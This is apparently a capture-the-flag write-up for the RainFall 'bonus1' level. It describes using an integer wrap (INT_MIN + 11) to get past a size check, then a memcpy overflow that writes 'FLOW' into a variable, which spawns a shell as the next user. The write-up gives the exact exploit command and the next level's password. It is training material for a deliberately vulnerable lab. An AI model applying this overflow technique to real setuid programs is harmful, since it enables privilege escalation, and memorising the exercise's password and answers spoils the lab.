There is a setuid binary "bonus1" own by bonus2

After disassembling the binary we can see that main() function call execl() with "/bin/sh"
only if it assert number == 0x574f4c46      <=>     "WOLF"
but number also need to be less than 10

We could somewhat use the memcpy() to replace the number value with a buffer overflow
we need to overflow 4 Bytes after the buffer


to do that we need to make `number * 4 == 44`
while number remain less than 10


Here we will use number underflow in our adventage

11 				=> 0x0000000b  * 4	=> 0x 0000002c
INT_MIN + 11 	=> 0x8000000b  * 4	=> 0x70000002c
but here we use 32 bit number so 0x70000002c underflow to 0x0000002c which is equal to 44

then we set the value of argv[1] to match requirement

argv[0] => (INT_MIN + 11) => -(2**31) + 11 => -2147483637
argv[1] => "#" * 40 + "FLOW"

bonus1@RainFall:~$> ./bonus1 "-2147483637" "########################################FLOW"

bonus2@RainFall:~$> cat ~bonus2/.pass
579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245
